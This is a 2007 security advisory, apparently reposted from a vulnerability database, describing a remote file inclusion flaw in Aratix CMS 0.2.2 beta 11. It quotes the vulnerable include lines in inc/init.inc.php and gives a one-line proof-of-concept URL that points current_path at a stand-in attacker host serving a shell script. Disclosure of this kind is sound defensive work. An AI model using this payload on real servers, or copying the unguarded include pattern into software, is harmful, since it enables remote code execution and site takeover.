Lucene search

K
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15595
HistoryJan 05, 2007 - 12:00 a.m.

Aratix <= 0.2.2b11 (inc/init.inc.php) Remote File Include Vulnerability

2007-01-0500:00:00
vulners.com
19

±------------------------------------------------------------------------------------------

  • Aratix <= 0.2.2b11 (inc/init.inc.php) Remote File Include Vulnerability
    ±------------------------------------------------------------------------------------------
  • Vendor …: http://www.aratix.de/
  • Affected Software .: Aratix <= 0.2.2 beta 11
  • Download …: http://download.xitara.net/aratix/aratix-0.2.2beta11.tar.gz
  • Description …: "Aratix is the next generation of CMS and Groupware"
  • Class …: Remote File Inclusion
  • Risk …: High (Remote File Execution)
  • Found By …: nuffsaid <nuffsaid[at]newbslove.us>
    ±------------------------------------------------------------------------------------------
  • Details:
  • Aratix inc/init.inc.php does not initialize the $current_path variable before using it to
  • include files, assuming register_globals = on, we can initialize the variable in a query
  • string and include a remote file of our choice.
  • Vulnerable Code:
  • inc/init.inc.php, line(s) 16-41:
  • -> 16: include $current_path . 'inc/session.inc.php';
  • -> 17: include $current_path . 'inc/pages.inc.php';
  • -> 18: include $current_path . 'inc/modules.inc.php';
  • -> 33: include $current_path . 'inc/functions.inc.php'; // Zus�tzliche Funktionen einbinden
  • -> 41: include $current_path . 'extern/smarty/Smarty.class.php';
  • Proof Of Concept:
  • http://[target]/[path]/inc/init.inc.php?current_path=http://evilsite.com/shell.php?
    ±------------------------------------------------------------------------------------------